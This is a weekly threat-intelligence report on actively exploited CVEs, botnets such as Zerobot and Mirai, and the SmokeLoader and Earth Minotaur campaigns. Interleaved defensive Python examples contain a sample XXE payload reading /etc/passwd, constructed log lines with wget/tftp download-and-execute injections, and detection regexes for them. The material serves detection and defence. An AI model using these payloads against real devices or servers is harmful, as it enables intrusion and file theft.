Cyber Threat Insights: Critical Vulnerabilities, Botnet Surges, and Advanced Threat Actor Activities

December 6, 2024
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

This week, four vulnerabilities were added to the CISA KEV catalog, impacting CyberPanel, North Grid Proself, ProjectSend, and Zyxel devices. Active exploitation of Microsoft Partner Center and I-O DATA routers underscores significant risks to privileged access and network integrity. Google addressed a critical Chromium flaw, mitigating arbitrary code execution threats.

Botnet activity surged, with Zerobot targeting Tenda WiFi routers, Andoryu exploiting GitLab vulnerabilities, and various botnets attacking Huawei routers. IoT Reaper continues to exploit a decade-old Cisco router vulnerability, highlighting risks posed by outdated systems.

Additionally, SmokeLoader malware and the Earth Minotaur group exhibited increased activity, underscoring the need for robust defenses against evolving cyber threats.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.

CVE-2024-51378

CyberPanel versions 2.3.6 and 2.3.7 contain a critical flaw (CVSS 10) in the getresetstatus functionality in dns/views.py and ftp/views.py. The vulnerability allows remote command execution by circumventing the middleware's security checks, making it a significant threat. It has been included in the CISA KEV catalog, emphasizing its priority for patching.

CVE-2024-11680

A critical improper authentication vulnerability (CVSS 9.8) in the open-source file-sharing application ProjectSend has been identified, enabling remote, unauthenticated attackers to exploit the system by sending specially crafted HTTP requests to its configuration settings. The flaw affects versions prior to r1720. Although initially patched in May 2023, the vulnerability was publicly disclosed in August 2024 with the release of version r1720. This vulnerability has been added to the CISA KEV catalog for heightened awareness and prioritization.  

CVE-2024-11667

A directory traversal vulnerability has been discovered in the web management interface of Zyxel ZLD firewall firmware, assigned a CVSS score of 7.5 (high). This flaw has been actively exploited by the Helldown ransomware group to compromise targeted systems. Due to the significant risk posed, this vulnerability has been added to the CISA KEV catalog, underscoring its critical importance for immediate mitigation.  
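The directory traversal class above comes down to one missing check: the web interface never confirms that the file it is about to open still lies under its document root. As an added illustration (not part of the report, and not code from Zyxel or any other product named here), the following Python shows that containment check together with a request-level heuristic suitable for a WAF rule or a log search. The root directory and the request strings are constructed for the example.

```python
"""Added example: containing user-supplied file names under a fixed root.

The root directory and the request strings are constructed for illustration;
nothing here is taken from a product named in the report."""
import os
from typing import Optional
from urllib.parse import unquote


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Return the path of `requested` relative to `root`, normalised, or None
    when the request would resolve to a location outside `root`.

    Decoding is done twice so that double-encoded separators (..%252f) are
    judged in their final form; a leading '/' is treated as relative to the
    root rather than as an absolute path.
    """
    decoded = unquote(unquote(requested)).replace("\\", "/")
    if "\x00" in decoded:           # NUL truncation tricks are never legitimate
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/")))
    # commonpath is the right containment test: a plain startswith() would
    # accept "/srv/www-private/x" as being inside "/srv/www".
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return os.path.relpath(candidate, root_real)


def is_traversal_attempt(requested: str) -> bool:
    """Request-level heuristic for a WAF rule or a log search: true when any
    path segment is '..' after decoding, whether or not it would have escaped."""
    decoded = unquote(unquote(requested)).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


if __name__ == "__main__":
    # Constructed requests against a constructed root directory.
    for req in ("css/site.css", "docs/../index.html", "../../etc/passwd",
                "%2e%2e/%2e%2e/etc/passwd", "..%252f..%252fetc/passwd"):
        print(f"{req!r:34} -> {resolve_under_root('/srv/www', req)!r}")
```

The two functions answer different questions: `resolve_under_root` is the server-side gate (it decides whether a file may be served), while `is_traversal_attempt` is deliberately noisier and also flags requests such as `docs/../index.html` that would have resolved safely, because on a management interface any `..` segment is worth an alert.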

CVE-2023-45727

A vulnerability in North Grid Proself has been identified, allowing remote, unauthenticated attackers to execute XML External Entity (XXE) attacks. By sending specially crafted XML requests, attackers can exploit this flaw to access and read sensitive files on the server, potentially exposing private account information. With a CVSS score of 7.5 (high), this vulnerability poses a significant risk and has been added to the CISA KEV catalog, emphasizing the urgency for remediation.
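An XXE flaw of the kind described above exists only because the parser is allowed to honour entity declarations in untrusted input. The Python below is an added example (not code from North Grid or from the report) of the simplest robust defence: reject any body that carries a DOCTYPE or ENTITY declaration before a parser sees it, then read the one field a hypothetical endpoint needs. Both sample documents are constructed.

```python
"""Added example: refusing XML that can carry entity declarations.

An external entity can only be introduced through a DOCTYPE, so rejecting any
document that declares one (or an ENTITY directly) removes the XXE class and
entity-expansion bombs in one check, before a parser ever sees the input.
The sample documents are constructed for illustration."""
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Byte-level check on the raw request body; case-insensitive and run before
# any decoding so that a parser quirk cannot mask the declaration.
_ENTITY_DECL = re.compile(rb"<!\s*(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

SAMPLE_BENIGN = (b'<?xml version="1.0"?>'
                 b'<request><file>report.pdf</file></request>')
# Constructed sample of the shape an XXE probe takes; the entity value is
# never read here because the document is rejected before parsing.
SAMPLE_XXE = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE request [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
              b'<request><file>&ext;</file></request>')


def xml_declares_entities(data: bytes) -> bool:
    """True when the body contains a DOCTYPE or ENTITY declaration."""
    return _ENTITY_DECL.search(data) is not None


def parse_untrusted(data: bytes) -> Optional[ET.Element]:
    """Parse an untrusted XML body, or return None if it is rejected."""
    if xml_declares_entities(data):
        return None
    try:
        return ET.fromstring(data)
    except ET.ParseError:
        return None


def requested_file(data: bytes) -> Optional[str]:
    """What the hypothetical endpoint wants from the body: the <file> text."""
    root = parse_untrusted(data)
    if root is None:
        return None
    node = root.find("file")
    return node.text if node is not None else None


if __name__ == "__main__":
    for label, doc in (("benign", SAMPLE_BENIGN), ("xxe", SAMPLE_XXE)):
        print(f"{label}: rejected={xml_declares_entities(doc)} "
              f"file={requested_file(doc)!r}")
```

The pre-parse gate is parser-independent, which is the point: it works the same whether the application later uses the standard library, lxml (where `resolve_entities=False` and `no_network=True` on `XMLParser` are the matching settings) or defusedxml. Logging the rejected bodies also gives a direct detection signal for XXE probing against the endpoint.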

CVE-2024-49035

An improper access control vulnerability has been identified in the Microsoft Partner Center Platform (partner.microsoft[.]com), allowing unauthenticated attackers to exploit the flaw for privilege escalation over a network. This vulnerability, which has been assigned a CVSS score of 8.7 (high), poses a significant risk by potentially compromising sensitive operations and data. Active exploitation of this flaw has been observed, although the company has not disclosed detailed information about real-world exploitation, leaving the extent of its active use unclear.

CVE-2024-12053

A type confusion vulnerability identified in Google Chrome (versions prior to 131.0.6778.108) poses a significant security risk, with a CVSS rating of 8.8 (High). This flaw allows remote attackers to exploit object corruption through specially crafted HTML pages, potentially leading to arbitrary code execution. Such exploitation could compromise user security and privacy by granting unauthorized access to sensitive data and functionalities on targeted systems. This vulnerability underscores the importance of updating to the latest version of Chrome to mitigate potential threats.

CVE-2024-45841, CVE-2024-47133 and CVE-2024-52564

Multiple vulnerabilities have been identified in I-O DATA’s UD-LT1 and UD-LT1/EX hybrid LTE routers, with active exploitation reportedly underway. These flaws allow unauthorized access to the device settings from the internet without requiring a VPN connection, raising significant security concerns. I-O DATA acknowledged receiving customer inquiries about the risks, including potential unauthorized access to settings screens. JPCERT/CC has issued an alert, emphasizing that these vulnerabilities pose critical threats such as credential theft, unauthorized command execution, and complete bypassing of firewall protections. Users are strongly advised to implement available security updates and mitigate exposure by restricting remote access.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

| Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | False | False |
| CVE-2023-4966 | NetScaler ADC and NetScaler Gateway | Critical | Buffer overflow vulnerability in NetScaler ADC and NetScaler Gateway leads to sensitive information disclosure | True | True |
| CVE-2023-38646 | Metabase Enterprise | Critical | Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 | True | False |
| | Apache Hadoop | Critical | Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop | False | False |
| CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | True |
| CVE-2022-30023 | Tenda Devices | High | Command injection vulnerability via the Ping function in Tenda products | False | False |
| CVE-2022-24847 | GeoServer | High | Improper input validation vulnerability in GeoServer leads to arbitrary code execution | False | False |

Vulnerabilities abused by Botnet

Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are presented below, selected for payloads suggestive of botnet activity, such as wget invocations against raw IP addresses.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2022-30023 | Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 | Command injection vulnerability via the Ping function in Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 | True | Zerobot |
| CVE-2021-22205 | Gitlab-Exiftool | Remote code execution vulnerability in Gitlab-Exiftool | True | Andoryu |
| CVE-2017-17215 | Huawei HG532 | Remote code execution vulnerability in Huawei HG532 router | True | HinataBot, Zerobot, Mirai, Bashlite, Gitpaste, Beastmode, Enemybot, PerlBot, QakBot, Ircbot |
| CVE-2013-2678 | Cisco Linksys E4200 1.0.05 Build 7 routers | Local file inclusion vulnerability in Cisco Linksys E4200 1.0.05 Build 7 routers leads to obtaining sensitive information or executing arbitrary code | True | IoTReaper |
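The selection rule behind this table, a payload that fetches something from a bare IP address with wget (or curl/tftp) and then runs it, is also a usable detection rule. The Python below is an added example, not code from the report or from Loginsoft's sensor platform: it applies that rule to web access-log lines and reports the source, the download host and the supporting indicators. The log lines, endpoints and addresses are constructed (RFC 5737 documentation ranges); nothing is taken from a product named in the table.

```python
"""Added example: flagging botnet-style download payloads in web request logs.

The log lines, endpoints and addresses below are constructed for illustration
(RFC 5737 documentation ranges); nothing is taken from a product in the report."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, unquote_plus

_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# A downloader pointed at a raw IP within the same shell command (no ; | & crossed).
_FETCH_FROM_IP = re.compile(rf"\b(?:wget|curl|tftp)\b[^;|&]*?(?P<ip>{_IPV4})", re.I)
# The execution step that usually follows the download.
_EXEC_CHAIN = re.compile(r"(?:\bchmod\s+\S+|\bsh\s+\S+|\./\S+)")
# Apache/nginx combined log format; only GET query strings are visible here.
_LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log: two botnet-style payloads, one plain page view and
# one download from a hostname (not flagged by this rule).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Dec/2024:10:12:01 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1%3Bwget+http%3A%2F%2F198.51.100.7%2Fbins%2Fmips%3Bchmod+%2Bx+mips%3B.%2Fmips HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Dec/2024:10:12:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.31 - - [03/Dec/2024:10:13:10 +0000] "GET /cgi-bin/ping.cgi?host=%60tftp+-g+-r+x86+198.51.100.7%60 HTTP/1.1" 500 0 "-" "Hello-World"
198.51.100.20 - - [03/Dec/2024:10:14:00 +0000] "GET /cgi-bin/fetch.cgi?url=http://mirror.example.org/pkg.tar.gz HTTP/1.1" 200 88 "-" "curl/8.0"
"""


def analyze_request(path: str) -> Dict[str, object]:
    """Classify one request target. unquote_plus first (turns '+' into space
    and %2B into '+'), then a plain unquote for double-encoded payloads."""
    decoded = unquote(unquote_plus(path))
    fetch = _FETCH_FROM_IP.search(decoded)
    indicators: List[str] = []
    if fetch:
        indicators.append("fetch_from_ip")
    if _EXEC_CHAIN.search(decoded):
        indicators.append("exec_chain")
    if any(tok in decoded for tok in (";", "|", "`", "$(")):
        indicators.append("shell_metachar")
    return {
        "botnet_like": fetch is not None,   # the rule the table above applies
        "payload_host": fetch.group("ip") if fetch else None,
        "indicators": indicators,
        "decoded": decoded,
    }


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = _LOG_LINE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one alert per request whose payload fetches from a raw IP."""
    alerts: List[Dict[str, object]] = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = analyze_request(rec["path"])
        if verdict["botnet_like"]:
            alerts.append({"src": rec["src"], "ts": rec["ts"],
                           "payload_host": verdict["payload_host"],
                           "indicators": verdict["indicators"],
                           "path": rec["path"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']} -> {alert['payload_host']} "
              f"{alert['indicators']}")
```

The caveat for anyone running this against real logs: a standard access log only exposes the request line, so injection carried in a POST body (the more common case for router management endpoints) is invisible here, which is exactly why the sensor telemetry in the previous section captures full payloads rather than relying on server logs.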

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is studied by an analyst and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2017-0199 and CVE-2017-11882

Entities in Taiwan's manufacturing, healthcare, and information technology sectors are being targeted in a newly discovered phishing campaign aimed at distributing the SmokeLoader malware. FortiGuard Labs identified the attack chain beginning with phishing emails containing malicious Microsoft Excel attachments. These attachments exploit long-standing security vulnerabilities, such as CVE-2017-0199 and CVE-2017-11882, to deliver the malware loader called Ande Loader. Once executed, Ande Loader facilitates the deployment of SmokeLoader on compromised systems, potentially enabling attackers to exfiltrate data or execute further malicious activities.  

Earth Minotaur campaign exploits Windows and Chrome vulnerabilities to deliver MOONSHINE Exploit kit and DarkNimbus backdoor

Trend Micro researchers have uncovered a campaign by a threat group known as Earth Minotaur, which leverages the MOONSHINE exploit kit to target Android vulnerabilities in instant messaging applications. This activity primarily affects Tibetan and Uyghur communities, raising concerns about regional and political targeting. The MOONSHINE exploit kit is used to deliver the DarkNimbus backdoor to both Android and Windows devices, potentially turning this into a cross-platform threat. Notably, the campaign targets popular apps like WeChat and exploits multiple vulnerabilities in Chromium-based browsers and applications. Regular software updates are strongly recommended to mitigate these risks and prevent exploitation.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2017-0199 | High | Remote code execution vulnerability in Microsoft Office and WordPad | Yes | Ande Loader, SmokeLoader | True |
| CVE-2017-11882 | High | Memory corruption vulnerability in Microsoft Office allows attackers to execute malicious code by exploiting the software's improper handling of in-memory data | Yes | Ande Loader, SmokeLoader | False |
| CVE-2016-1646 | High | Out of bounds read vulnerability in Array.prototype.concat implementation in builtins.cc in Google V8 | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2016-5198 | High | Incorrect optimization assumptions enabled remote attackers to carry out arbitrary read and write operations through a specially crafted HTML page | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2017-5030 | High | Memory corruption issue in the V8 JavaScript library in Google Chrome | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2017-5070 | High | Type confusion in V8 in Google Chrome allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | False |
| CVE-2018-6065 | High | Integer overflow vulnerability in V8 in Google Chrome | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2018-17463 | High | Incorrect side effect annotation in V8 in Google Chrome | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2018-17480 | High | Out of bounds write vulnerability in V8 in Google Chrome | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |
| CVE-2020-6418 | High | Type confusion vulnerability in V8 in Google Chrome leads to heap corruption via a crafted HTML page | Yes | MOONSHINE exploit kit, DarkNimbus backdoor | True |

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.

| CVE-ID | Type of Vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2024-50389 | Improper Permission | QuRouter | Resource |
| CVE-2024-7953 | Missing Permission | DataEdgePlatform DataMosaix Private Cloud 7.07 | Resource |
| CVE-2024-52564 | Inclusion of Undocumented Features | I-O DATA routers UD-LT1 and UD-LT1/EX | Resource |
| CVE-2024-47133 | OS Command Injection | I-O DATA routers UD-LT1 and UD-LT1/EX | Resource |
| CVE-2024-45841 | Incorrect Permission | I-O DATA routers UD-LT1 and UD-LT1/EX | Resource |

External References

  1. https://www.cisa.gov/news-events/alerts/2024/12/04/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.cisa.gov/news-events/alerts/2024/12/03/cisa-adds-three-known-exploited-vulnerabilities-catalog
  3. https://thehackernews.com/2024/12/hackers-target-uyghurs-and-tibetans.html
  4. https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html
  5. https://thehackernews.com/2024/12/smokeloader-malware-resurfaces.html
  6. https://www.fortinet.com/blog/threat-research/sophisticated-attack-targets-taiwan-with-smokeloader
